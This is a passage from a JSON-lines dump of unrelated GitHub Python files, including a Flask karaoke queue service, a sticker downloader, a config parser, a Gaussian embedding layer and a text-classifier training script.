open('index.html','r')\n rd = fl.read();\n fl.close();\n \n\n rd = rd.replace(\"[QUEUE]\",GetQueueList()) \n \n rd = rd.replace(\"[SONGS]\",GetSongList())\n \n return rd\n\ndef CheckForNextJob():\n nextwaiting = None\n busy = False\n for n in conversions:\n if n.progress == \"In Queue\":\n if nextwaiting is None:\n nextwaiting = n\n if n.progress != \"In Queue\" and n.progress != \"Complete\" and n.progress != \"Failed\":\n busy = True\n break\n \n if busy == False:\n print(\"Starting Conversion...\")\n if nextwaiting != None:\n nextwaiting.Start()\n\nclass ConversionJob:\n def __init__(self):\n self.id = None\n self.artist = \"\"\n self.title = \"\"\n self.progress = \"In Queue\"\n self.thread = None\n self.finalfile = \"\"\n \n def UpdateProgress(self,st):\n self.progress = st\n \n def runfunc(self):\n self.progress = \"Working\"\n try:\n fname = karaoke.Kareokise(self.title,self.artist,statusfunction=self.UpdateProgress)\n except:\n self.UpdateProgress(\"Failed\")\n traceback.print_exc()\n return\n \n shutil.move(fname,\"web/videos/\" + fname)\n shutil.move(\"thumbnail.jpg\",\"web/videos/\" + fname.replace(\"mp4\",\"jpg\"))\n try:\n shutil.move(\"ytvideo.ass\",\"web/videos/\" + fname.replace(\"mp4\",\"ass\"))\n except:\n pass\n try:\n shutil.move(fname.replace(\"mp4\",\"ogg\"),\"web/videos/\" + fname.replace(\"mp4\",\"ogg\"))\n except:\n pass\n self.finalfile = fname;\n self.progress = \"Complete\" \n ReloadSongs()\n CheckForNextJob()\n \n def Start(self):\n self.thread = threading.Thread(target=self.runfunc)\n self.thread.daemon = True\n self.thread.start()\n\nclass Song:\n def __init__(self,filename):\n self.artist = \"\"\n self.track = \"\"\n self.thumbnail = \"/videos/\" + filename.replace(\"mp4\",\"jpg\")\n self.status = \"Ready\"\n self.job = None\n self.path = filename\n self.version = 1\n self.age = 0\n \n global reftime\n \n nm = filename.replace(\".mp4\",\"\")\n bits = nm.split(\" - \")\n if len(bits) > 1:\n self.artist = bits[0].strip()\n self.track = bits[1].strip()\n else:\n self.track = bits[0]\n self.artist = \"Unknown\"\n \n if os.path.exists(\"web/videos/\" + filename.replace(\".mp4\",\".ogg\")):\n self.version = 2\n\n self.age = int((time.time() - os.path.getctime(\"web/videos/\" + filename)) / 86000) \n print(\"Checking On \" + \"web/videos/\" + filename.replace(\".mp4\",\".ogg\") + \" \" + str(self.age))\n \n def Get(self,nm):\n if nm == 'artist':\n return self.artist\n else:\n if nm == 'new':\n if self.age < 1:\n return \"Today\"\n if self.age < 2:\n return \"Yesterday\"\n if self.age < 7:\n return \"This Week\"\n if self.age < 14:\n return \"This Fortnight\"\n if self.age < 31:\n return \"This Month\"\n if self.age < 365:\n return \"This Year\" \n return \"Other\"\n else:\n return self.track\n \nsongs = []\n\ndef ReloadSongs():\n global songs\n songs = []\n #print(\"Loading Songs...\")\n for fl in glob.glob('web/videos/*.mp4'):\n #print(fl)\n songs.append(Song(os.path.basename(fl)))\n \nReloadSongs();\n\n@app.route(\"/searchsong\",methods = ['POST','GET'])\ndef songsearch():\n c = ConversionJob()\n print(str(request.form))\n c.title = request.form.get('track')\n c.artist = request.form.get('artist')\n conversions.append(c)\n \n print(\"Searching For \" + c.title + \" / \" + c.artist)\n \n CheckForNextJob()\n \n return redirect(\"/\") \n\ndef GetQueueList():\n queuecontent = \"\"\n for q in conversions:\n if q.progress != \"Complete\" and q.progress != \"Failed\":\n queuecontent += '

    ' + q.progress + '

    ' + q.title + '

    ' + q.artist + '

    '\n #else:\n # queuecontent += '

    PLAY

    ' + q.title + '

    ' + q.artist + '

    ' \n \n return queuecontent\n\n@app.route(\"/queue\")\ndef queuerequest(): \n return GetQueueList()\n\ndef artistsort(a):\n return a.artist\n\ndef titlesort(a):\n return a.track\n\ndef newsort(a): \n return \"{:06d}\".format(a.age) + a.track\n\ndef GetSongList():\n \n sortorder = \"artist\"\n if request.args.get(\"sort\") is not None:\n sortorder = request.args.get(\"sort\") \n # session['sortorder'] = request.args.get(\"sort\") \n #else:\n #if 'sortorder' in session:\n #sortorder = session['sortorder']\n \n if sortorder == 'artist':\n songs.sort(key=artistsort) \n else:\n if sortorder == 'new':\n songs.sort(key=newsort)\n else:\n songs.sort(key=titlesort)\n\n lastfirst = None\n queuecontent = \"\"\n indx = -1\n anyitems = False\n counter = 0\n for q in songs:\n indx += 1\n \n counter += 1\n \n if lastfirst is None or lastfirst != q.Get(sortorder)[0]:\n if lastfirst is not None:\n queuecontent += ''\n counter = 0\n if sortorder == 'new': \n queuecontent += '
    ' + q.Get(sortorder).upper() + '
    ';\n else:\n queuecontent += '
    ' + q.Get(sortorder).upper()[0] + '
    ';\n queuecontent += '
    '\n pass\n #if lastfirst is not None:\n # queuecontent += \"
    \"\n #queuecontent += '
    ' + q.Get(sortorder).upper()[0] + '
    ';\n #counter = 0\n \n \n if counter > 0 and counter % 4 == 0:\n #if counter > 0:\n # queuecontent += \"\"\n queuecontent += '
    '\n \n anyitems = True\n if q.status != \"Ready\":\n queuecontent += '' \n else:\n queuecontent += '' \n \n lastfirst = q.Get(sortorder)[0]\n \n if anyitems == True:\n queuecontent += \"
    \"\n return queuecontent \n\n@app.route(\"/audiooffset\")\ndef audiooffset(): \n newoffset = request.cookies.get('laoffset')\n if newoffset is None:\n newoffset = 0\n else:\n newoffset = float(newoffset)\n \n change = request.args.get('change')\n if change is None:\n newoffset = 0\n else:\n newoffset += float(change)\n resp = make_response(str(newoffset))\n resp.set_cookie('laoffset',str(newoffset))\n return resp\n\n@app.route(\"/songs\")\ndef songrequest(): \n return GetSongList()\n \n@app.route(\"/play\")\ndef playback(): \n \n chosen = None\n\n global songs\n for s in songs:\n if request.args.get('video') in s.path:\n chosen = s\n break\n \n if s.version == 2:\n fl = open('player2.html','r')\n rd = fl.read();\n fl.close();\n else:\n fl = open('player.html','r')\n rd = fl.read();\n fl.close();\n \n\n vurl = request.args.get('video')\n offset = 0\n \n jsnfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".json\") \n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content)\n if 'lyricOffset' in md:\n if md['lyricOffset'] is not None:\n offset = -md['lyricOffset']\n \n laoffset = request.cookies.get('laoffset')\n if laoffset is None:\n laoffset = 0\n\n rd = rd.replace(\"[OFFSET]\",str(offset))\n rd = rd.replace(\"[LAOFFSET]\",str(laoffset))\n rd = rd.replace(\"[VIDEOFILE]\",vurl)\n rd = rd.replace(\"[VIDEOSCRIPT]\",vurl.replace(\"'\",\"\\\\'\"))\n rd = rd.replace(\"[VIDEOTITLE]\",request.args.get('video'))\n return rd\n\n@app.route(\"/findonline\")\ndef findonline(): \n \n title = request.args.get('track')\n artist = request.args.get('artist') \n\n song = karaoke.FindYTSong(title,artist)\n \n candidate = [] \n \n headers={ 'content-type':'application/json'} \n \n if song is None: \n return \"[]\",200,headers\n \n ob = {}\n ob['name'] = song.title\n ob['thumb'] = song.thumbnail_url\n candidate.append(ob)\n \n return json.dumps(candidate),200,headers\n \n@app.route(\"/timing\")\ndef timing():\n\n dta = request.args.get(\"video\") \n adjust = request.args.get(\"adjust\")\n timing = request.args.get(\"timing\")\n \n chosen = None\n\n global songs\n for s in songs:\n if request.args.get('video') in s.path:\n chosen = s\n break\n \n\n jsnfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".json\") \n if timing is not None:\n #Get file offset...\n md = {}\n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content) \n \n lyricfile = os.path.dirname(__file__) + \"/web/videos/\" + chosen.path.replace(\".mp4\",\".ass\")\n fl = open(lyricfile,'r')\n content = fl.read()\n fl.close()\n\n st = karaoke.GetAssLyricOffset(content)\n offset = float(timing) - st\n md['lyricOffset'] = offset\n \n print(str(timing) + \" vs \" + str(st))\n fx = open(jsnfile,'w') \n fx.write(json.dumps(md))\n fx.flush()\n fx.close()\n else:\n md = {}\n if os.path.exists(jsnfile):\n fx = open(jsnfile,'r')\n content = fx.read()\n fx.close()\n md = json.loads(content) \n else:\n md['lyricOffset'] = 0\n \n if 'lyricOffset' not in md:\n md['lyricOffset'] = 0\n \n md['lyricOffset'] += float(adjust)\n \n fx = open(jsnfile,'w') \n fx.write(json.dumps(md))\n fx.flush()\n fx.close() \n\n return \"/play/video=\" + dta + \"&timing=\" + timing\n #return redirect(\"/play/video=\" + dta + \"&timing=\" + timing) \n\n@app.route(\"/upgrade\")\ndef upgrade():\n\n dta = request.args.get(\"name\") \n bits = dta.split(\" - \")\n c = ConversionJob() \n c.title = bits[1]\n c.artist = bits[0]\n conversions.append(c)\n \n print(\"Searching For \" + c.title + \" / \" + c.artist)\n \n CheckForNextJob()\n \n return redirect(\"/\") \n\n@app.route(\"/\")\ndef hello_world(): \n \n return mainPage()","repo_name":"ignorantbliss/Flaskaraoke","sub_path":"karaokeservice.py","file_name":"karaokeservice.py","file_ext":"py","file_size_in_byte":12257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19223641913","text":"import xinstall.task as xtask\nimport importlib.resources as pkg_resources\nimport xinstall.resources as xresources\nimport shutil\n\n\nclass CopyResource(xtask.Task):\n \"\"\"Copy a resource to a given destination.\"\"\"\n\n def __init__(self, resource_name, destination_path):\n \"\"\"See `Task.__init__`\"\"\"\n super().__init__()\n self.resource_name = resource_name\n self.destination_path = xtask.parse_path(destination_path)\n\n def run(self):\n \"\"\"See `Task.run`\"\"\"\n if not pkg_resources.is_resource(xresources, self.resource_name):\n self._error(\"Resource '{}' does not exist\".format(self.resource_name))\n return False\n\n with pkg_resources.path(xresources, self.resource_name) as path:\n self._info(\n \"Copying resources '{}' to {}\".format(\n self.resource_name, self.destination_path\n )\n )\n\n try:\n shutil.copyfile(path, self.destination_path)\n except Exception:\n self._exception(\"An error occured during the copy\")\n return False\n\n return True\n","repo_name":"XanX3601/xinstall","sub_path":"xinstall/task/CopyResource.py","file_name":"CopyResource.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37474097472","text":"import sys\n\nN = int(sys.stdin.readline())\nanswer = set([])\n\nwhile N>0:\n inst = sys.stdin.readline().split()\n if inst[0] == 'all':\n answer = set(range(1,21))\n elif inst[0] == 'empty':\n answer = set([])\n else:\n num = int(inst[1])\n inst = inst[0]\n if inst == 'add':\n answer.add(num)\n elif inst == 'remove':\n if num in answer:\n answer.remove(num)\n elif inst == 'check':\n if num in answer:\n print(1)\n else:\n print(0)\n elif inst == 'toggle':\n if num in answer:\n answer.remove(num)\n else:\n answer.add(num)\n N -= 1","repo_name":"ujos89/1day1problem","sub_path":"baekjoon/algorithm/brute_force/b11723.py","file_name":"b11723.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3583543452","text":"import os\nfrom os.path import basename, splitext\n\n\nclass Downloader:\n\n def __init__(self, bot):\n self.bot = bot\n\n def download(self, sticker_name):\n sticker_set = self.bot.getStickerSet(sticker_name)\n sticker_json = {'name': sticker_set.name, 'title': sticker_set.title, 'stickers': [], 'animated':sticker_set.is_animated}\n\n if not os.path.exists(sticker_set.name):\n os.makedirs(sticker_set.name + \"/thumb\")\n\n have_thumb = False\n if sticker_set.thumb is not None:\n have_thumb = True\n file = self.bot.getFile(sticker_set.thumb.file_id)\n file.download(sticker_set.name + \"/thumb/\" + basename(file.file_path))\n sticker_json['thumb'] = sticker_set.name + \"/thumb/\" + basename(file.file_path)\n for st in sticker_set.stickers:\n file = self.bot.getFile(st.file_id)\n if not have_thumb:\n sticker_json['thumb'] = sticker_set.name + \"/\" + basename(file.file_path)\n file.download(sticker_set.name + \"/\" + basename(file.file_path))\n sticker_json['stickers'].append(sticker_set.name + \"/\" + basename(file.file_path))\n\n return sticker_json\n","repo_name":"Z17-CU/ToDusStickerBot","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43739739742","text":"import os, sys\n\n\ndef get_config():\n \"\"\"Calls the load configuration method and checks for cml args\"\"\"\n if len(sys.argv) < 2:\n print(\"Missing Configuration Argument\")\n sys.exit(1)\n\n elif len(sys.argv) > 2:\n print(\"Too many arguments\")\n sys.exit(1)\n\n else:\n filename = sys.argv[1]\n\n #parse config\n config, message = parse_config(filename)\n\n #config invalid\n if config == -1:\n print(message)\n sys.exit(1)\n\n return config\n\n\ndef parse_config(filename):\n \"\"\"Parse a confiugration file and returns a dictionary of key value fields\"\"\"\n\n config_dict = {\n \"staticfiles\": None,\n \"cgibin\": None,\n \"port\": None,\n \"exec\": None\n }\n\n if not os.path.exists(filename):\n return -1, \"Unable To Load Configuration File\"\n\n try:\n with open(filename, \"r\") as f:\n content = f.readlines()\n\n for ln in content:\n try:\n key_pair = ln.strip().split(\"=\")\n\n #missing either key or value field\n if not key_pair[0] or not key_pair[1]:\n raise IndexError\n\n if key_pair[0] in config_dict:\n config_dict[key_pair[0]] = key_pair[1]\n #unknown key\n else:\n return -1, f\"Invalid key: {ln}\"\n\n except IndexError:\n return -1, f\"Missing field on line: {ln}\"\n\n # check that all fields have been set\n for key, val in config_dict.items():\n if val == None:\n return -1, f\"Missing Field From Configuration File\"\n\n return config_dict, None\n\n except OSError:\n return -1, \"Unable To Load Configuration File\"\n\n return -1, f\"Unspecified error parsing configuration file {filename}\"\n","repo_name":"Haeata-Ash/minimal_cgi_webserver","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13867792654","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\n# Adapted from here : https://github.com/NVIDIA/NeMo/blob/b4040fb37350ae86b64a5f53be911371d7a3879d/nemo/collections/tts/modules/talknet.py\ndef merge(tensors, dim=0, value=0, dtype=None):\n \"\"\"Merges list of tensors into one.\"\"\"\n tensors = [tensor if isinstance(tensor, torch.Tensor) else torch.tensor(tensor) for tensor in tensors]\n dim = dim if dim != -1 else len(tensors[0].shape) - 1\n dtype = tensors[0].dtype if dtype is None else dtype\n max_len = max(tensor.shape[dim] for tensor in tensors)\n new_tensors = []\n for tensor in tensors:\n pad = (2 * len(tensor.shape)) * [0]\n pad[-2 * dim - 1] = max_len - tensor.shape[dim]\n new_tensors.append(F.pad(tensor, pad=pad, value=value))\n return torch.stack(new_tensors).to(dtype=dtype)\n\ndef repeat_merge(x, reps, pad):\n \"\"\"Repeats `x` values according to `reps` tensor and merges.\"\"\"\n return merge(\n tensors=[torch.repeat_interleave(text1, durs1) for text1, durs1 in zip(x, reps)], value=pad, dtype=x.dtype,\n )\nclass GaussianEmbedding(nn.Module):\n \"\"\"Gaussian embedding layer..\"\"\"\n\n EPS = 1e-6\n\n def __init__(\n self, idim, embed_dim=64, padding_idx=0, sigma_c=2.0, merge_blanks=False,\n ):\n super().__init__()\n\n self.embed = nn.Embedding(idim, embedding_dim=embed_dim, padding_idx=padding_idx)\n self.pad = 0\n self.sigma_c = sigma_c\n self.merge_blanks = merge_blanks\n\n def forward(self, text, durs):\n \"\"\"See base class.\"\"\"\n # Fake padding\n text = F.pad(text, [0, 2, 0, 0], value=self.pad)\n durs = F.pad(durs, [0, 2, 0, 0], value=0)\n\n repeats = repeat_merge(text, durs, self.pad)\n print(repeats.shape)\n total_time = repeats.shape[-1]\n\n # Centroids: [B,T,N]\n c = (durs / 2.0) + F.pad(torch.cumsum(durs, dim=-1)[:, :-1], [1, 0, 0, 0], value=0)\n c = c.unsqueeze(1).repeat(1, total_time, 1)\n\n # Sigmas: [B,T,N]\n sigmas = durs\n sigmas = sigmas.float() / self.sigma_c\n sigmas = sigmas.unsqueeze(1).repeat(1, total_time, 1) + self.EPS\n assert c.shape == sigmas.shape\n\n # Times at indexes\n t = torch.arange(total_time, device=c.device).view(1, -1, 1).repeat(durs.shape[0], 1, durs.shape[-1]).float()\n t = t + 0.5\n\n ns = slice(None)\n if self.merge_blanks:\n ns = slice(1, None, 2)\n\n # Weights: [B,T,N]\n d = torch.distributions.normal.Normal(c, sigmas)\n w = d.log_prob(t).exp()[:, :, ns] # [B,T,N]\n pad_mask = (text == self.pad)[:, ns].unsqueeze(1).repeat(1, total_time, 1)\n w.masked_fill_(pad_mask, 0.0) # noqa\n w = w / (w.sum(-1, keepdim=True) + self.EPS)\n pad_mask = (repeats == self.pad).unsqueeze(-1).repeat(1, 1, text[:, ns].size(1)) # noqa\n w.masked_fill_(pad_mask, 0.0) # noqa\n pad_mask[:, :, :-1] = False\n w.masked_fill_(pad_mask, 1.0) # noqa\n\n # Embeds\n u = torch.bmm(w, self.embed(text)[:, ns, :]) # [B,T,E]\n\n return u\n \nif __name__ == \"__main__\":\n txt = torch.ones(1, 10).to(torch.long)\n dur = torch.tensor([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]).unsqueeze(0).to(torch.long)\n print(txt.shape)\n print(dur.shape)\n embed = GaussianEmbedding()\n \n print(embed(txt, dur).shape)","repo_name":"rishikksh20/TalkNet2-pytorch","sub_path":"embedding.py","file_name":"embedding.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"35"} +{"seq_id":"8097966011","text":"import os\nimport sys\n\nBase_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(Base_DIR)\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n# print(os.path.split(rootPath)[0])\nsys.path.append(os.path.split(rootPath)[0])\nimport argparse\nimport pandas as pd\nimport tqdm\nfrom datasets import Dataset\nimport torch.nn as nn\nfrom config.config import config\nimport torch\nfrom transformers.optimization import get_linear_schedule_with_warmup\nfrom torch.utils.data import DataLoader\nfrom transformers import BertTokenizer\nfrom torch.optim import AdamW\nfrom transformers.models.bert.modeling_bert import BertConfig\nfrom model.KozmoClassifier import KozmoClassifier\n\n\nclass Trainer:\n def __init__(self, config, epoch, lr=4e-4, gama=0.8, weight_decay=0.01,\n save_path=\"\",\n gradient_accumulation_steps=1, max_grad_norm=1.0):\n self.num_warmup = epoch / 10\n self.num_training = epoch\n self.max_grad_norm = max_grad_norm\n self.config = config\n self.pretrain_config = BertConfig.from_pretrained(self.config.bert_path)\n self.tokenizer = BertTokenizer.from_pretrained(self.config.bert_path, local_files_only=True)\n self.model = torch.load(self.config.normal_encoder_path).to(self.config.device)\n self.kozmo_decoder = KozmoClassifier(config).to(self.config.device)\n self.akn = torch.load(self.config.akn_path).to(self.config.device)\n self.gama = gama\n self.save_path = save_path\n self.device = self.config.device\n self.log_freq = 100\n self.gradient_accumulation_steps = gradient_accumulation_steps\n self.kc_param = self.get_param(self.kozmo_decoder, weight_decay)\n self.lm_param = self.get_param(self.model, weight_decay)\n self.lm_optimizer = AdamW(params=self.lm_param + self.kc_param, lr=lr)\n self.lm_scheduler = get_linear_schedule_with_warmup(self.lm_optimizer,\n num_warmup_steps=self.num_warmup,\n num_training_steps=self.num_training)\n\n def get_param(self, model, weight_decay):\n no_decay = ['bias', 'LayerNorm.Weight']\n optimizer_grouped_parameters = [\n {'params': [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n 'weight_decay': weight_decay},\n {'params': [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n 'weight_decay': 0.0}\n ]\n\n return optimizer_grouped_parameters\n\n def save_model(self):\n torch.save(self.model, self.config.encoder_path)\n\n def save_semaspace(self):\n torch.save(self.kozmo_decoder, self.config.semaspace_path)\n\n def save(self):\n self.save_model()\n self.save_semaspace()\n\n def get_akn(self, pre, post):\n input_shape = pre.shape\n pre = pre.flatten()\n post = post.flatten()\n local_akn = self.akn[pre, post].reshape(input_shape)\n\n return local_akn\n\n def get_context_akn(self, input_ids, input_mask):\n max_act_len = torch.max(torch.sum(input_mask, dim=-1))\n act_dis_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device)\n dis_matrix = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device, dtype=torch.float64)\n\n for shift in range(max_act_len):\n shift_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device) #\n if shift != 0:\n\n shift_tags[:, :-(shift), shift:] = torch.eye(input_ids.shape[1] - shift,\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n temp_akn = self.get_akn(input_ids[:, :-(shift)], input_ids[:, shift:])\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n\n shift_tags = torch.zeros(size=[input_ids.shape[0], input_ids.shape[1], input_ids.shape[1]],\n device=input_ids.device) #\n shift_tags[:, shift:, :-(shift)] = torch.eye(input_ids.shape[1] - shift,\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n temp_akn = self.get_akn(input_ids[:, shift:], input_ids[:, :-(shift)])\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n else:\n shift_tags = torch.eye(input_ids.shape[1],\n device=input_ids.device).unsqueeze(0).repeat(\n input_ids.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n temp_akn = self.get_akn(input_ids, input_ids)\n dis_matrix[shift_tags == 1] = torch.flatten(temp_akn, start_dim=0, end_dim=-1) #\n # for batch_num, batch in enumerate(dis_matrix):\n # dis_matrix[batch_num] = dis_matrix[input_mask[batch_num].usqueeze(0).repeat(input_mask.shape[1], 1)]\n mean_dis = torch.div(torch.sum(torch.sum(dis_matrix, dim=-1), dim=-1), torch.mul(torch.sum(input_mask, dim=-1), torch.sum(input_mask, dim=-1)))\n associative_score = torch.sigmoid(torch.div(dis_matrix, (mean_dis.unsqueeze(-1).unsqueeze(-1) + 1e-8))) - 0.5\n\n mean_as = torch.div(torch.sum(associative_score, dim=-1), torch.sum(input_mask, dim=-1).unsqueeze(-1).repeat(1, input_mask.shape[1]))\n mean_as = mean_as.unsqueeze(-1)\n associative_score = associative_score / (mean_as + 1e-8)\n associative_score = associative_score * input_mask.unsqueeze(1)\n\n return associative_score\n\n def loc_loss(self, input_ids, input_mask, dis_matrix, act_dis_tags):\n local_akn = self.get_context_akn(input_ids, input_mask)\n similarities = torch.cosine_similarity(dis_matrix[act_dis_tags == 1], local_akn[act_dis_tags == 1], dim=-1)\n return 1 - torch.mean(similarities)\n\n def reconstruction_loss(self, encoder_out, decoder_out):\n loss_fun = nn.L1Loss()\n loss = loss_fun(encoder_out, decoder_out)\n\n return loss\n\n def target_process(self, tgt_ids, tgt_mask, tgt_label):\n act_tgt_ids = tgt_ids * (tgt_label == 0) * tgt_mask\n act_tgt_mask = tgt_mask * (tgt_label == 0) * tgt_mask\n\n return act_tgt_ids, act_tgt_mask\n\n def ar_correction_loss(self, post_states, tgt_ids, input_mask):\n labels = tgt_ids[input_mask == 1]\n loss_fun = nn.CrossEntropyLoss()\n loss = loss_fun(post_states[input_mask > 0].view(-1, self.config.vocab_size),\n labels.long())\n decoder_ids = torch.argmax(post_states, dim=-1)\n total = torch.sum(input_mask > 0)\n correct = torch.sum(torch.eq(decoder_ids[input_mask > 0], labels))\n return loss, correct.item(), total.item()\n\n def correction_loss(self, decoder_out, prd_label):\n labels = prd_label[prd_label > 0]\n loss_fun = nn.CrossEntropyLoss()\n loss = loss_fun(decoder_out[prd_label > 0].view(-1, self.config.vocab_size),\n labels.long())\n\n decoder_ids = torch.argmax(decoder_out, dim=-1)\n total = torch.sum(prd_label > 0)\n correct = torch.sum(torch.eq(decoder_ids[prd_label > 0], labels))\n return loss, correct.item(), total.item()\n\n def do_correct(self, sentence):\n predict_label = self.evaluate(sentence)\n\n return predict_label\n\n def preprocess(self, input_sentence):\n tokenized_sentence = self.tokenizer(input_sentence, padding='max_length', max_length=128)\n input_text = torch.tensor(tokenized_sentence[\"input_ids\"], device=self.device).unsqueeze(0)\n input_mask = torch.tensor(tokenized_sentence[\"attention_mask\"], device=self.device).unsqueeze(0)\n return input_text, input_mask\n\n def evaluate(self, input_sentence):\n self.model.to(self.device)\n self.model.eval()\n self.kozmo_decoder.to(self.device)\n self.kozmo_decoder.eval()\n input_ids, input_mask = self.preprocess(input_sentence)\n encoder_out, _ = self.model(input_ids, input_mask)\n classifier_out, kozmo_dis = self.kozmo_decoder(encoder_out)\n decode_out = torch.argmax(classifier_out, dim=-1)\n return decode_out.item()\n\n def merge(self, kozmo_dis, input_mask):\n act_dis_tags = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device)\n dis_matrix = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device)\n max_act_len = torch.max(torch.sum(input_mask, dim=-1))\n for shift in range(max_act_len):\n shift_tags = torch.zeros(size=[kozmo_dis.shape[0], kozmo_dis.shape[1], kozmo_dis.shape[1]],\n device=kozmo_dis.device) #\n\n shift_tags[:, :-(shift + 1), shift + 1:] = torch.eye(kozmo_dis.shape[1] - shift - 1,\n device=kozmo_dis.device).unsqueeze(0).repeat(\n kozmo_dis.shape[0],\n 1, 1) #\n act_dis_tags += shift_tags #\n shift_dis = torch.cosine_similarity(kozmo_dis[:, shift + 1:], kozmo_dis[:, :-(shift + 1)], dim=-1)\n # shift_location = location[:, shift + 1:] - location[:, :-(shift + 1)] #\n # shift_dis = self.get_euclidean_dis(shift_location) #\n dis_matrix[shift_tags == 1] = torch.flatten(shift_dis, start_dim=0, end_dim=-1) #\n\n return dis_matrix, act_dis_tags\n\n def sighan_eval(self):\n current_count = 0\n correct_count = 0\n test_file = pd.read_csv(\"/home/wangfanyu/project/GraphDecoder/data/Weibo/test2.csv\")\n labels = test_file[\"label\"]\n texts = test_file[\"text\"]\n for label, text in zip(labels, texts):\n strip_line = text.strip()\n predict_label = self.do_correct(strip_line)\n current_count += 1\n if predict_label == label:\n correct_count += 1\n\n print(correct_count / current_count)\n\n def train(self, train_data, epoch, train=True):\n str_code = \"train\" if train else \"val\"\n self.model.to(self.device)\n self.model.train()\n self.kozmo_decoder.to(self.device)\n self.kozmo_decoder.train()\n data_loader = tqdm.tqdm(enumerate(train_data),\n desc=\"EP_%s:%d\" % (str_code, epoch),\n total=len(train_data),\n bar_format=\"{l_bar}{r_bar}\")\n current_iter = 1\n c_correct = 0\n w_correct = 0\n c_total = 0\n w_total = 0\n avg_loss_m = 0\n iter_loss_m = 0\n for step, data in data_loader:\n # 1. Data Preprocess\n label = data[\"label\"]\n input_ids = data[\"input_text\"]\n input_mask = (input_ids > 0).int()\n encoder_out, _ = self.model(input_ids, input_mask)\n classifier_out, kozmo_dis = self.kozmo_decoder(encoder_out)\n ce_loss_fun = nn.CrossEntropyLoss()\n correction_loss = ce_loss_fun(classifier_out,\n label.view(-1).long())\n loss = correction_loss\n decoder_out = torch.argmax(classifier_out, dim=-1)\n c_correct += torch.sum(\n torch.eq(decoder_out[label == 1],\n label[label == 1])).item() #\n w_correct += torch.sum(\n torch.eq(decoder_out[label == 0],\n label[label == 0])).item() #\n c_total += torch.sum(label == 1).item()\n w_total += torch.sum(label == 0).item()\n avg_loss_m += correction_loss.item()\n iter_loss_m += correction_loss.item()\n self.lm_optimizer.zero_grad()\n correction_loss.backward()\n torch.nn.utils.clip_grad_norm_(self.model.parameters(), max_norm=self.max_grad_norm) #\n torch.nn.utils.clip_grad_norm_(self.kozmo_decoder.parameters(), max_norm=self.max_grad_norm) #\n\n if (step + 1) % self.gradient_accumulation_steps == 0:\n self.lm_optimizer.step()\n self.lm_scheduler.step()\n avg_loss_m += correction_loss.item()\n iter_loss_m += correction_loss.item()\n post_fix = {\n \"epoch\": epoch,\n \"iter\": step,\n \"avg_loss_c\": \"%.2f\" % (avg_loss_m / (step + 1)),\n \"iter_loss_m\": \"%.2f\" % (iter_loss_m / current_iter),\n \"iter_c\": str(c_correct) + \"/\" + str(c_total),\n \"iter_w\": str(w_correct) + \"/\" + str(w_total),\n }\n\n if step % self.log_freq == 0:\n iter_loss_m = 0\n current_iter = 100\n c_total = 0\n w_total = 0\n c_correct = 0\n w_correct = 0\n data_loader.write(str(post_fix))\n\n print(\"EP%d_%s, correct_avg_loss=\" % (epoch, str_code), avg_loss_m / len(data_loader))\n return avg_loss_m / len(data_loader)\n\n\nclass ClassifyDataset(Dataset):\n def __init__(self, dataset, max_length, device):\n self.dataset = dataset\n self.data_size = len(dataset)\n self.device = torch.device(device)\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n self.tokenizer = BertTokenizer.from_pretrained(\"bert-base-chinese\", local_files_only=True)\n self.max_size = max_length\n\n def __len__(self):\n return self.data_size\n\n def __getitem__(self, item):\n item = self.dataset.iloc[item]\n label = item['label']\n input_text = self.tokenizer(item['text'], padding='max_length', max_length=512)[\"input_ids\"]\n\n output = {\n 'label': torch.tensor(label, device=self.device),\n 'input_text': torch.tensor(input_text, device=self.device),\n }\n\n return {key: value for key, value in output.items()}\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--dataset\", type=str, default=rootPath + \"/data\",\n help=\"train dataset\")\n parser.add_argument(\"-m\", 